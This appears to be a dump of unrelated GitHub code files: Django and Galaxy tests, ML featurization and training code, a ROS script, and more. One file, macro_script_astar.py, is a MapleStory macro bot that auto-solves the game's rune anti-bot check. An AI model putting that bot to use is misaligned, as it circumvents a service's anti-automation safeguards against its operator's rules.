today_solr = force_solr_date_format(nowu_str, True)\n\n # solr tests\n self.assertEqual(vals_dict[\"title\"], \"New Blog Post\")\n self.assertEqual(vals_dict[\"content_type\"], \"BLOG\")\n self.assertEqual(vals_dict[\"begin_time\"], today_solr)\n\n # list of tag types:\n tt_title_list = [tt.split('.')[2] for tt in vals_dict[\"tag_types\"]]\n # list of tag type codes:\n tt_code_list = [tt.split('.')[1] for tt in vals_dict[\"tag_types\"]]\n # list of tag type ids:\n tt_id_list = [tt.split('.')[0] for tt in vals_dict[\"tag_types\"]]\n\n # equivalence routine for tag_types and associated tags\n # this tests taxo topics in solr already:\n for index, (tt1, tt2) in enumerate(zip(dr.contenttagtype.order_by('tag_type__title').all(),\n pu.contenttagtype.order_by('tag_type__title').all())):\n self.assertEqual(tt1.tag_type.title, tt2.tag_type.title)\n self.assertEqual(tt2.tag_type.title in tt_title_list, True)\n tag_title_list = [t.split('.')[2] for t in vals_dict[\"tags_%s\" % tt2.tag_type.code]]\n for index2, (t1, t2) in enumerate(\n zip(tt1.tags.order_by('tag__title').all(), tt2.tags.order_by('tag__title').all())):\n self.assertEqual(t1.title, t2.title)\n self.assertEqual(t2.title in tag_title_list, True)\n\n # equivalence routine for taxo_topics \n for index, (val1, val2) in enumerate(zip(dr.taxo_topics.all(), pu.taxo_topics.all())):\n self.assertEqual(val1.title, val2.title)\n\n groups_list = vals_dict[\"permission_groups\"]\n\n # equivalence routine for groups: \n for index, (val1, val2) in enumerate(zip(dr.permission_groups.all(), pu.permission_groups.all())):\n self.assertEqual(val1.name, val2.name)\n self.assertEqual(val2.name in groups_list, True)\n\n self.assertEqual(dr.published_time, None)\n # id, published_time, (django: _state), updated_time \n self.assertEqual(dr.publish_status, 'DRAFT')\n self.assertEqual(pu.publish_status, 'PUBLISHED')\n self.assertEqual(dr.id + 1, pu.id)\n print(\"end of test_publish_blog_post\")\n","repo_name":"furmanczyk5/Django-Enterprise-App","sub_path":"blog/tests/test_publish_blog.py","file_name":"test_publish_blog.py","file_ext":"py","file_size_in_byte":5683,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"22436776852","text":"import os\nimport pickle\nimport sys\n\nimport numpy as np\nimport pandas as pd\nimport scipy.sparse as sparse\nimport yaml\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer\n\n\ndef get_df(data):\n \"\"\"Read the input data file and return a data frame.\"\"\"\n df = pd.read_csv(\n data,\n encoding=\"utf-8\",\n header=None,\n delimiter=\"\\t\",\n names=[\"id\", \"label\", \"text\"],\n )\n sys.stderr.write(f\"The input data frame {data} size is {df.shape}\\n\")\n return df\n\n\ndef save_matrix(df, matrix, names, output):\n \"\"\"\n Save the matrix to a pickle file.\n\n Args:\n df (pandas.DataFrame): Input data frame.\n matrix (scipy.sparse.csr_matrix): Input matrix.\n names (list): List of feature names.\n output (str): Output file name.\n \"\"\"\n id_matrix = sparse.csr_matrix(df.id.astype(np.int64)).T\n label_matrix = sparse.csr_matrix(df.label.astype(np.int64)).T\n\n result = sparse.hstack([id_matrix, label_matrix, matrix], format=\"csr\")\n\n msg = \"The output matrix {} size is {} and data type is {}\\n\"\n sys.stderr.write(msg.format(output, result.shape, result.dtype))\n\n with open(output, \"wb\") as fd:\n pickle.dump((result, names), fd)\n pass\n\n\ndef generate_and_save_train_features(train_input, train_output, bag_of_words, tfidf):\n \"\"\"\n Generate train feature matrix.\n\n Args:\n train_input (str): Train input file name.\n train_output (str): Train output file name.\n bag_of_words (sklearn.feature_extraction.text.CountVectorizer): Bag of words.\n tfidf (sklearn.feature_extraction.text.TfidfTransformer): TF-IDF transformer.\n \"\"\"\n df_train = get_df(train_input)\n train_words = np.array(df_train.text.str.lower().values)\n\n bag_of_words.fit(train_words)\n\n train_words_binary_matrix = bag_of_words.transform(train_words)\n feature_names = bag_of_words.get_feature_names_out()\n\n tfidf.fit(train_words_binary_matrix)\n train_words_tfidf_matrix = tfidf.transform(train_words_binary_matrix)\n\n save_matrix(df_train, train_words_tfidf_matrix, feature_names, train_output)\n\n\ndef generate_and_save_test_features(test_input, test_output, bag_of_words, tfidf):\n \"\"\"\n Generate test feature matrix.\n\n Args:\n test_input (str): Test input file name.\n test_output (str): Test output file name.\n bag_of_words (sklearn.feature_extraction.text.CountVectorizer): Bag of words.\n tfidf (sklearn.feature_extraction.text.TfidfTransformer): TF-IDF transformer.\n \"\"\"\n df_test = get_df(test_input)\n test_words = np.array(df_test.text.str.lower().values)\n\n test_words_binary_matrix = bag_of_words.transform(test_words)\n test_words_tfidf_matrix = tfidf.transform(test_words_binary_matrix)\n feature_names = bag_of_words.get_feature_names_out()\n\n save_matrix(df_test, test_words_tfidf_matrix, feature_names, test_output)\n\n\ndef main():\n params = yaml.safe_load(open(\"params.yaml\"))[\"featurize\"]\n\n np.set_printoptions(suppress=True)\n\n if len(sys.argv) != 3 and len(sys.argv) != 5:\n sys.stderr.write(\"Arguments error. Usage:\\n\")\n sys.stderr.write(\"\\tpython featurization.py data-dir-path features-dir-path\\n\")\n sys.exit(1)\n\n in_path = sys.argv[1]\n out_path = sys.argv[2]\n\n train_input = os.path.join(in_path, \"train.tsv\")\n test_input = os.path.join(in_path, \"test.tsv\")\n train_output = os.path.join(out_path, \"train.pkl\")\n test_output = os.path.join(out_path, \"test.pkl\")\n\n max_features = params[\"max_features\"]\n ngrams = params[\"ngrams\"]\n\n os.makedirs(out_path, exist_ok=True)\n\n bag_of_words = CountVectorizer(\n stop_words=\"english\", max_features=max_features, ngram_range=(1, ngrams)\n )\n tfidf = TfidfTransformer(smooth_idf=False)\n\n generate_and_save_train_features(\n train_input=train_input,\n train_output=train_output,\n bag_of_words=bag_of_words,\n tfidf=tfidf,\n )\n\n generate_and_save_test_features(\n test_input=test_input,\n test_output=test_output,\n bag_of_words=bag_of_words,\n tfidf=tfidf,\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"iterative/example-get-started","sub_path":"src/featurization.py","file_name":"featurization.py","file_ext":"py","file_size_in_byte":4158,"program_lang":"python","lang":"en","doc_type":"code","stars":160,"dataset":"github-code","pt":"3"} +{"seq_id":"30443615582","text":"#!/usr/bin/env python\nimport roslib; roslib.load_manifest('move')\nimport rospy\nfrom geometry_msgs.msg import Twist\n\n\n\ndef go():\n pub = rospy.Publisher('cmd_vel',Twist)\n rospy.init_node('move')\n\n s = rospy.myargv()[1:]\n\n #publish and quit\n twist = Twist()\n twist.linear.x = 0; twist.linear.y = 0; twist.linear.z = 0\n twist.angular.x = 0; twist.angular.y = 0; twist.angular.z = 0\n rospy.logerr(\"test\")\n if len(s) == 1:\n s = s[0]\n if s == \"forward\":\n rospy.logerr(\"test\")\n twist.linear.x = 1\n pub.publish(twist)\n elif s == \"backward\":\n twist.linear.x = -1\n pub.publish(twist)\n elif s == \"left\":\n twist.angular.z = 1\n pub.publish(twist)\n elif s == \"right\":\n twist.angular.z = -1\n pub.publish(twist)\n elif s == \"stop\":\n pub.publish(twist)\n return\n\n\n\ndef dtrace(s,x):\n rospy.loginfo(s+\" == %s\"%x)\n return x\n\nif __name__ == '__main__':\n go()\n\n\n\n","repo_name":"dutchcheesehead/ROSMAV","sub_path":"brown-ros-pkg-read-only/experimental/robot_dialog/move/bin/move.py","file_name":"move.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"35864998617","text":"from django.shortcuts import render\nfrom .models import *\n\n\n\ndef home(request):\n #for from\n if request.method == 'POST':\n name = request.POST['name']\n email = request.POST['email']\n subject = request.POST['subject']\n message = request.POST['message']\n \n new_massage = massage(name = name,email = email,sub = subject,text = massage)\n new_massage.save()\n \n #end from code\n my_services = services.objects.all()\n my_work = work.objects.all()\n my_about = about.objects.all()\n diction = {'myservices':my_services,'mywork':my_work,'myabout':my_about}\n return render(request,'home.html',context=diction)\n\n\n \n","repo_name":"masrafe53/resume_website","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15456931721","text":"\"\"\"\nThis sample code has been copied from\nhttps://github.com/ChrisDelClea/streamlit-agraph\n\"\"\"\n\nfrom streamlit_agraph import agraph, Node, Edge, Config\n\nnodes = []\nedges = []\nnodes.append( Node(id=\"Spiderman\",\n label=\"Peter Parker\",\n size=25,\n shape=\"circularImage\",\n image=\"http://marvel-force-chart.surge.sh/marvel_force_chart_img/top_spiderman.png\")\n ) # includes **kwargs\nnodes.append( Node(id=\"Captain_Marvel\",\n size=25,\n shape=\"circularImage\",\n image=\"http://marvel-force-chart.surge.sh/marvel_force_chart_img/top_captainmarvel.png\")\n )\nedges.append( Edge(source=\"Captain_Marvel\",\n label=\"friend_of\",\n target=\"Spiderman\",\n # **kwargs\n )\n )\n\nconfig = Config(width=500,\n height=500,\n # **kwargs\n )\n\nreturn_value = agraph(nodes=nodes,\n edges=edges,\n config=config)\n","repo_name":"whitphx/stlite","sub_path":"packages/sharing-editor/public/samples/012_custom_components/pages/agraph.py","file_name":"agraph.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":757,"dataset":"github-code","pt":"3"} +{"seq_id":"43021996475","text":"class Solution:\n def maxDepth(self, root: TreeNode) -> int:\n if root is None:\n return 0\n else:\n return max(self.maxDepth(root.left), self.maxDepth(root.right)) + 1\n \n'''\nLeetcode-Easy\n104. Maximum Depth of Binary Tree\nRuntime: 40 ms, faster than 71.38%\n'''\n","repo_name":"kaitlynning/Py-practice","sub_path":"104. Maximum Depth of Binary Tree.py","file_name":"104. Maximum Depth of Binary Tree.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"69883939283","text":"import terrain_analyzer as ta\nfrom terrain_analyzer import METHOD_DROP, METHOD_MOVEL, METHOD_MOVER, METHOD_DBLJMP, METHOD_DBLJMP_HALF, METHOD_DBLJMP_MAX\nimport directinput_constants as dc\nimport macro_script\nimport logging, math, time, random\n\nclass CustomLogger:\n def __init__(self, logger_obj, logger_queue):\n self.logger_obj = logger_obj\n self.logger_queue = logger_queue\n\n def debug(self, *args):\n self.logger_obj.debug(\" \".join([str(x) for x in args]))\n if self.logger_queue:\n self.logger_queue.put((\"log\", \" \".join([str(x) for x in args])))\n\n def exception(self, *args):\n self.logger_obj.exception(\" \".join([str(x) for x in args]))\n if self.logger_queue:\n self.logger_queue.put((\"log\", \" \".join([str(x) for x in args])))\n\nclass MacroControllerAStar(macro_script.MacroController):\n \"\"\"\n This is a new port of MacroController from macro_script with improved pathing. MacroController Used PlatforScan,\n which is an tree search algorithm I implemented, and works at indivisual platform level. However, V2 uses A* path\n finding and works at pixel level, which allows more randomized and fluent moving.\n \"\"\"\n def loop(self):\n \"\"\"\n Main event loop for Macro\n Will now use current coordinates and A* to find a new path.\n :return: loop exit code(same as macro_script.py)\n \"\"\"\n random.seed((time.time() * 10**4) % 10 **3)\n\n if not self.player_manager.skill_counter_time:\n self.player_manager.skill_counter_time = time.time()\n if time.time() - self.player_manager.skill_counter_time > 60:\n print(\"skills casted in duration %d: %d skill/s: %f\"%(int(time.time() - self.player_manager.skill_counter_time), self.player_manager.skill_cast_counter, self.player_manager.skill_cast_counter/int(time.time() - self.player_manager.skill_counter_time)))\n self.logger.debug(\"skills casted in duration %d: %d skill/s: %f skill/s\"%(int(time.time() - self.player_manager.skill_counter_time), self.player_manager.skill_cast_counter, self.player_manager.skill_cast_counter/int(time.time() - self.player_manager.skill_counter_time)))\n self.player_manager.skill_cast_counter = 0\n self.player_manager.skill_counter_time = time.time()\n if not self.screen_capturer.ms_get_screen_hwnd():\n self.logger.debug(\"Failed to get MS screen rect\")\n self.abort()\n return -1\n\n # Update Screen\n self.screen_processor.update_image(set_focus=False)\n # Update Constants\n player_minimap_pos = self.screen_processor.find_player_minimap_marker()\n if not player_minimap_pos:\n return -1\n self.player_manager.update(player_minimap_pos[0], player_minimap_pos[1])\n\n # Placeholder for Lie Detector Detector (sounds weird)\n\n # End Placeholder\n\n # Check if player is on platform\n self.current_platform_hash = None\n get_current_platform = self.find_current_platform()\n if not get_current_platform:\n # Move to nearest platform and redo loop\n # Failed to find platform.\n self.platform_fail_loops += 1\n if self.platform_fail_loops >= self.platform_fail_loop_threshold:\n self.logger.debug(\"stuck. attempting unstick()...\")\n self.unstick_attempts += 1\n self.unstick()\n if self.unstick_attempts >= self.unstick_attempts_threshold:\n self.logger.debug(\"unstick() threshold reached. sending error code..\")\n return -2\n else:\n return 0\n else:\n self.platform_fail_loops = 0\n self.unstick_attempts = 0\n self.current_platform_hash = get_current_platform\n\n # Rune Detector\n self.player_manager.update()\n rune_platform_hash, rune_coords = self.find_rune_platform()\n if rune_platform_hash:\n self.logger.debug(\"need to solve rune at platform {0}\".format(rune_platform_hash))\n rune_solve_time_offset = (time.time() - self.player_manager.last_rune_solve_time)\n if rune_solve_time_offset >= self.player_manager.rune_cooldown or rune_solve_time_offset <= 30:\n self.navigate_to_rune_platform()\n time.sleep(1)\n self.rune_solver.press_space()\n time.sleep(1.5)\n solve_result = self.rune_solver.solve_auto()\n self.logger.debug(\"rune_solver.solve_auto results: %d\" % (solve_result))\n if solve_result == -1:\n self.logger.debug(\"rune_solver.solve_auto failed to solve\")\n for x in range(4):\n self.keyhandler.single_press(dc.DIK_LEFT)\n\n self.player_manager.last_rune_solve_time = time.time()\n self.current_platform_hash = rune_platform_hash\n time.sleep(0.5)\n # End Rune Detector\n\n # Start inter-platform movement\n dest_platform_hash = random.choice([key for key in self.terrain_analyzer.platforms.keys() if key != self.current_platform_hash])\n dest_platform = self.terrain_analyzer.platforms[dest_platform_hash]\n self.player_manager.update()\n random_platform_coord = (random.randint(dest_platform.start_x, dest_platform.end_x), dest_platform.start_y)\n # Once we have selected the platform to move, we can generate a path using A*\n pathlist = self.terrain_analyzer.astar_pathfind((self.player_manager.x, self.player_manager.y), random_platform_coord)\n print(pathlist)\n for mid_coord, method in pathlist:\n self.player_manager.update()\n print(mid_coord, method)\n if method == METHOD_MOVER or method == METHOD_MOVEL:\n self.player_manager.optimized_horizontal_move(mid_coord[0])\n elif method == METHOD_DBLJMP:\n interdelay = self.terrain_analyzer.calculate_vertical_doublejump_delay(self.player_manager.y, mid_coord[1])\n print(interdelay)\n self.player_manager.dbljump_timed(interdelay)\n elif method == METHOD_DROP:\n self.player_manager.drop()\n time.sleep(1)\n # End inter-platform movement\n\n self.player_manager.randomize_skill()\n\n # Other buffs\n self.player_manager.holy_symbol()\n self.player_manager.hyper_body()\n self.player_manager.release_overload()\n time.sleep(0.05)\n\n # Finished\n self.loop_count += 1\n return 0\n\n\n def navigate_to_rune_platform(self):\n \"\"\"\n Uses A* pathfinding to navigate to rune coord\n :return: None\n \"\"\"\n pass","repo_name":"Dashadower/MS-Visionify","sub_path":"src/macro_script_astar.py","file_name":"macro_script_astar.py","file_ext":"py","file_size_in_byte":6764,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"3"} +{"seq_id":"25670025132","text":"from pathlib import Path\nimport requests\n\ndef locateAll(root: str, glob: str, ignore: list):\n dir = Path(root)\n all = sorted(dir.glob(glob))\n print(f\"Located {len(all)} {glob} files: {[str(file) for file in all]}\")\n\n if ignore:\n ignore = {str(Path(root) / file) for file in ignore}\n files = [file for file in all if str(file) not in ignore]\n pruned = list(set(all) - set(files))\n print(f\"Ignored {len(pruned)} of located files: {[str(file) for file in pruned]}\")\n return files\n else:\n return all\n\ndef writeDataToFile(path: str, lines: list):\n print(\"Writing data to \" + path)\n\n with open(path, \"w\", encoding=\"utf8\") as file:\n file.writelines(lines)\n\ndef updateScript(path, url):\n source = url + path\n raw = requests.get(source)\n writeDataToFile(path, raw.text)\n\n# ======== #\n# MAIN #\n\ndef update(updateSource = \"https://raw.githubusercontent.com/StefanTodoran/milkyway-js/main/\"):\n print(\"\\nUpdating MilkywayJS...\")\n\n libs = locateAll(\"./lib/\", \"*.py\", [\"__init__.py\", \"update.py\"])\n paths = [str(file).replace(\"\\\\\", \"/\") for file in libs]\n \n for path in paths:\n updateScript(path, updateSource)\n updateScript(\"manage.py\", updateSource)\n\n print(f\"Updated all {len(libs)} lib files!\\n\")\n\nif __name__ == \"__main__\":\n update()\n exit(\"Update complete! Press CTRL+C to exit.\")","repo_name":"StefanTodoran/milkyway-js","sub_path":"lib/update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25156861817","text":"\"\"\"\nThis script will take a source brain (where the data comes from) and an image brain \n(the brain whose images you want to display unstriped) and align the data from the point brain\nto the image brain. It first aligns the point brain data to the atlas, then that data\nto the image brain. It prints out the data by default and also will insert\ninto the database if given a layer name.\n\"\"\"\n\nimport argparse\nfrom tqdm import tqdm\nfrom pprint import pprint\nimport os\nimport sys\nfrom datetime import datetime\n\nHOME = os.path.expanduser(\"~\")\nDIR = os.path.join(HOME, 'programming/pipeline_utility/src')\nsys.path.append(DIR)\nfrom pipeline.Controllers.SqlController import SqlController\nfrom pipeline.lib.FileLocationManager import FileLocationManager\nfrom pipeline.utilities.utilities_alignment import parameter_elastix_parameter_file_to_dict\n\ndef slurp(animal):\n sqlController = SqlController(animal)\n fileLocationManager = FileLocationManager(animal)\n sqlController.clear_elastix(animal)\n\n\n INPUT = os.path.join(fileLocationManager.prep, 'CH1', 'thumbnail_cleaned')\n if not os.path.exists(INPUT):\n print(f'{INPUT} does not exist')\n sys.exit()\n ELASTIX = fileLocationManager.elastix_dir\n files = sorted(os.listdir(INPUT))\n for i in range(1, len(files)):\n fixed_index = os.path.splitext(files[i - 1])[0]\n moving_index = os.path.splitext(files[i])[0]\n\n new_dir = '{}_to_{}'.format(moving_index, fixed_index)\n output_subdir = os.path.join(ELASTIX, new_dir)\n filepath = os.path.join(output_subdir, 'TransformParameters.0.txt')\n\n if os.path.exists(filepath):\n d = parameter_elastix_parameter_file_to_dict(filepath)\n rotation, xshift, yshift = d['TransformParameters']\n sqlController.add_elastix_row(animal, moving_index, rotation, xshift, yshift)\n else:\n print(f'{filepath} does not exist')\n\n\n\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Work on Animal')\n parser.add_argument('--animal', help='Enter animal', required=True)\n parser.add_argument('--debug', help='Enter true of false', required=False, default='true')\n \n\n args = parser.parse_args()\n animal = args.animal\n debug = bool({'true': True, 'false': False}[str(args.debug).lower()])\n\n slurp(animal) \n\n","repo_name":"ActiveBrainAtlas2/preprocessing-pipeline","sub_path":"in_development/edward/fixes/slurp_elastix_files.py","file_name":"slurp_elastix_files.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"22726029792","text":"import os\nimport shutil\nimport tempfile\n\nfrom . import GalaxyTestBase, test_util\n\nFOO_DATA = 'foo\\nbar\\n'\n\n\nclass TestGalaxyLibraries(GalaxyTestBase.GalaxyTestBase):\n\n def setUp(self):\n super().setUp()\n self.name = 'automated test library'\n self.library = self.gi.libraries.create_library(self.name, description='automated test', synopsis='automated test synopsis')\n\n def tearDown(self):\n self.gi.libraries.delete_library(self.library['id'])\n\n def test_create_library(self):\n self.assertEqual(self.library['name'], self.name)\n self.assertIsNotNone(self.library['id'])\n\n def test_get_libraries(self):\n libraries_with_name = self.gi.libraries.get_libraries(name=self.name)\n self.assertEqual(len([l for l in libraries_with_name if l['id'] == self.library['id']]), 1)\n\n deleted_name = 'deleted test library'\n deleted_library_id = self.gi.libraries.create_library(deleted_name, description='a deleted library', synopsis='automated test synopsis')['id']\n self.gi.libraries.delete_library(deleted_library_id)\n deleted_libraries_with_name = self.gi.libraries.get_libraries(name=deleted_name, deleted=True)\n self.assertEqual(len([l for l in deleted_libraries_with_name if l['id'] == deleted_library_id]), 1)\n\n all_non_deleted_libraries = self.gi.libraries.get_libraries(deleted=False)\n self.assertEqual(len([l for l in all_non_deleted_libraries if l['id'] == self.library['id']]), 1)\n self.assertEqual([l for l in all_non_deleted_libraries if l['id'] == deleted_library_id], [])\n\n all_deleted_libraries = self.gi.libraries.get_libraries(deleted=True)\n self.assertEqual([l for l in all_deleted_libraries if l['id'] == self.library['id']], [])\n self.assertEqual(len([l for l in all_deleted_libraries if l['id'] == deleted_library_id]), 1)\n\n all_libraries = self.gi.libraries.get_libraries(deleted=None)\n self.assertEqual(len([l for l in all_libraries if l['id'] == self.library['id']]), 1)\n self.assertEqual(len([l for l in all_libraries if l['id'] == deleted_library_id]), 1)\n\n def test_show_library(self):\n library_data = self.gi.libraries.show_library(self.library['id'])\n self.assertEqual(self.library['id'], library_data['id'])\n self.assertEqual(self.library['name'], library_data['name'])\n\n def test_upload_file_from_url(self):\n self.gi.libraries.upload_file_from_url(self.library['id'], 'https://zenodo.org/record/582600/files/wildtype.fna?download=1')\n\n def test_upload_file_contents(self):\n self.gi.libraries.upload_file_contents(self.library['id'], FOO_DATA)\n\n def test_upload_file_from_local_path(self):\n with tempfile.NamedTemporaryFile(mode='w', prefix='bioblend_test_') as f:\n f.write(FOO_DATA)\n f.flush()\n self.gi.libraries.upload_file_from_local_path(self.library['id'], f.name)\n\n def test_upload_file_from_server(self):\n pass\n\n def test_upload_from_galaxy_filesystem(self):\n bnames = [f\"f{i}.txt\" for i in range(2)]\n tempdir = tempfile.mkdtemp(prefix='bioblend_test_')\n try:\n fnames = [os.path.join(tempdir, _) for _ in bnames]\n for fn in fnames:\n with open(fn, 'w') as f:\n f.write(FOO_DATA)\n filesystem_paths = '\\n'.join(fnames)\n ret = self.gi.libraries.upload_from_galaxy_filesystem(self.library['id'], filesystem_paths)\n for dataset_dict in ret:\n dataset = self.gi.libraries.wait_for_dataset(self.library['id'], dataset_dict['id'])\n self.assertEqual(dataset['state'], 'ok')\n ret = self.gi.libraries.upload_from_galaxy_filesystem(self.library['id'], filesystem_paths, link_data_only='link_to_files')\n for dataset_dict in ret:\n dataset = self.gi.libraries.wait_for_dataset(self.library['id'], dataset_dict['id'])\n self.assertEqual(dataset['state'], 'ok')\n finally:\n shutil.rmtree(tempdir)\n\n def test_copy_from_dataset(self):\n history = self.gi.histories.create_history()\n dataset_id = self._test_dataset(history['id'])\n self.gi.libraries.copy_from_dataset(self.library['id'], dataset_id, message='Copied from dataset')\n\n def test_update_dataset(self):\n library_id = self.library[\"id\"]\n dataset1 = self.gi.libraries.upload_file_contents(library_id, FOO_DATA)\n updated_dataset = self.gi.libraries.update_library_dataset(dataset1[0]['id'], name='Modified name', misc_info='Modified the name succesfully')\n self.assertEqual(updated_dataset[\"name\"], 'Modified name')\n self.assertEqual(updated_dataset[\"misc_info\"], 'Modified the name succesfully')\n\n def test_library_permissions(self):\n current_user = self.gi.users.get_current_user()\n user_id_list_new = [current_user['id']]\n self.gi.libraries.set_library_permissions(self.library['id'], access_in=user_id_list_new, modify_in=user_id_list_new, add_in=user_id_list_new, manage_in=user_id_list_new)\n ret = self.gi.libraries.get_library_permissions(self.library['id'])\n self.assertEqual({_[1] for _ in ret['access_library_role_list']}, set(user_id_list_new))\n self.assertEqual({_[1] for _ in ret['modify_library_role_list']}, set(user_id_list_new))\n self.assertEqual({_[1] for _ in ret['add_library_item_role_list']}, set(user_id_list_new))\n self.assertEqual({_[1] for _ in ret['manage_library_role_list']}, set(user_id_list_new))\n\n def test_dataset_permissions(self):\n current_user = self.gi.users.get_current_user()\n user_id_list_new = [current_user['id']]\n library_id = self.library[\"id\"]\n dataset1 = self.gi.libraries.upload_file_contents(library_id, FOO_DATA)\n ret = self.gi.libraries.set_dataset_permissions(dataset1[0]['id'], access_in=user_id_list_new, modify_in=user_id_list_new, manage_in=user_id_list_new)\n self.assertEqual({_[1] for _ in ret['access_dataset_roles']}, set(user_id_list_new))\n self.assertEqual({_[1] for _ in ret['modify_item_roles']}, set(user_id_list_new))\n self.assertEqual({_[1] for _ in ret['manage_dataset_roles']}, set(user_id_list_new))\n # test get_dataset_permissions\n ret_get = self.gi.libraries.get_dataset_permissions(dataset1[0]['id'])\n self.assertEqual({_[1] for _ in ret_get['access_dataset_roles']}, set(user_id_list_new))\n self.assertEqual({_[1] for _ in ret_get['modify_item_roles']}, set(user_id_list_new))\n self.assertEqual({_[1] for _ in ret_get['manage_dataset_roles']}, set(user_id_list_new))\n\n @test_util.skip_unless_galaxy('release_19.09')\n def test_upload_file_contents_with_tags(self):\n datasets = self.gi.libraries.upload_file_contents(self.library['id'], FOO_DATA, tags=[\"name:foobar\", \"barfoo\"])\n dataset_show = self.gi.libraries.show_dataset(self.library['id'], datasets[0]['id'])\n self.assertEqual(dataset_show['tags'], 'name:foobar, barfoo')\n\n @test_util.skip_unless_galaxy('release_19.09')\n def test_update_dataset_tags(self):\n datasets = self.gi.libraries.upload_file_contents(self.library['id'], FOO_DATA)\n dataset_show = self.gi.libraries.show_dataset(self.library['id'], datasets[0]['id'])\n self.assertEqual(dataset_show['tags'], \"\")\n\n updated_dataset = self.gi.libraries.update_library_dataset(datasets[0]['id'], tags=[\"name:foobar\", \"barfoo\"])\n dataset_show = self.gi.libraries.show_dataset(self.library['id'], updated_dataset['id'])\n\n self.assertEqual(dataset_show['tags'], 'name:foobar, barfoo')\n","repo_name":"violethaze74/galaxy","sub_path":"bioblend/_tests/TestGalaxyLibraries.py","file_name":"TestGalaxyLibraries.py","file_ext":"py","file_size_in_byte":7681,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"8152970933","text":"import torch\nfrom glob import glob\nfrom torch.utils.data import TensorDataset, ConcatDataset, DataLoader\nimport numpy as np\nimport os\nfrom tensorboardX import SummaryWriter\n\nfrom train.Arena import Arena\nfrom game.Players import RandomPlayer, NNPlayer\n\nclass Coach:\n def __init__(self, game, nnet, args):\n np.random.seed()\n\n self.game = game\n self.nnet = nnet\n self.pnet = self.nnet.__class__(self.game)\n self.args = args\n\n networks = sorted(glob(self.args.checkpoint+'/*'))\n self.args.start_iter = len(networks)\n if self.args.start_iter == 0:\n self.nnet.save_checkpoint(\n folder=self.args.checkpoint, filename='iteration-0000.pkl')\n self.args.start_iter = 1\n\n self.nnet.load_checkpoint(\n folder=self.args.checkpoint, filename=f'iteration-{(self.args.start_iter-1):04d}.pkl')\n\n if self.args.run_name != '':\n self.writer = SummaryWriter(log_dir='runs/'+self.args.run_name)\n else:\n self.writer = SummaryWriter()\n\n def learn(self):\n for i in range(self.args.start_iter, self.args.num_iters + 1):\n print(f'------ITER {i}------')\n self.train(i)\n if self.args.compare_with_random and i % self.args.random_compare_freq == 0:\n self.compareToRandom(i)\n if self.args.compare_with_past and i % self.args.past_compare_freq == 0:\n self.compareToPast(i)\n print()\n self.writer.close()\n\n def train(self, iteration):\n datasets = []\n currentHistorySize = min(max(4, (iteration + 4)//2),self.args.num_iters_for_train_examples_history)\n for i in range(max(1, iteration - currentHistorySize), iteration + 1):\n data_tensor = torch.load(\n f'{self.args.data}/iteration-{i:04d}-data.pkl')\n policy_tensor = torch.load(\n f'{self.args.data}/iteration-{i:04d}-policy.pkl')\n value_tensor = torch.load(\n f'{self.args.data}/iteration-{i:04d}-value.pkl')\n datasets.append(TensorDataset(\n data_tensor, policy_tensor, value_tensor))\n\n dataset = ConcatDataset(datasets)\n dataloader = DataLoader(dataset, batch_size=self.args.train_batch_size, shuffle=True,\n num_workers=self.args.workers, pin_memory=True)\n\n train_steps = min(self.args.train_steps_per_iteration, \n 2 * (iteration + 1 - max(1, iteration - currentHistorySize)) * self.args.max_sample_num // self.args.train_batch_size)\n l_pi, l_v = self.nnet.train(dataloader, train_steps)\n self.writer.add_scalar('loss/policy', l_pi, iteration)\n self.writer.add_scalar('loss/value', l_v, iteration)\n self.writer.add_scalar('loss/total', l_pi + l_v, iteration)\n\n self.nnet.save_checkpoint(\n folder=self.args.checkpoint, filename=f'iteration-{iteration:04d}.pkl')\n\n del dataloader\n del dataset\n del datasets\n\n def compareToPast(self, iteration):\n past = max(0, iteration - 10)\n self.pnet.load_checkpoint(folder=self.args.checkpoint,\n filename=f'iteration-{past:04d}.pkl')\n print(f'PITTING AGAINST ITERATION {past}')\n pplayer = NNPlayer(self.game, self.pnet, self.args.arena_temp)\n nplayer = NNPlayer(self.game, self.nnet, self.args.arena_temp)\n\n arena = Arena(nplayer.play, pplayer.play, self.game)\n nwins, pwins, draws = arena.playGames(self.args.arena_compare)\n\n print(f'NEW/PAST WINS : {nwins} / {pwins} ; DRAWS : {draws}\\n')\n self.writer.add_scalar(\n 'win_rate/to past', float(nwins + 0.5 * draws) / (pwins + nwins + draws), iteration)\n\n def compareToRandom(self, iteration):\n r = RandomPlayer(self.game)\n nnplayer = NNPlayer(self.game, self.nnet, self.args.arena_temp)\n print('PITTING AGAINST RANDOM')\n\n arena = Arena(nnplayer.play, r.play, self.game)\n nwins, pwins, draws = arena.playGames(self.args.arena_compare_random)\n\n print(f'NEW/RANDOM WINS : {nwins} / {pwins} ; DRAWS : {draws}\\n')\n self.writer.add_scalar(\n 'win_rate/to random', float(nwins + 0.5 * draws) / (pwins + nwins + draws), iteration)","repo_name":"ACMClassCourse-2021/PPCA-AIBattle-2022","sub_path":"train/Coach.py","file_name":"Coach.py","file_ext":"py","file_size_in_byte":4302,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"35823674831","text":"#!/usr/bin/python3\n\nimport math\n\ndef max_moves(Xf) :\n X = 0\n 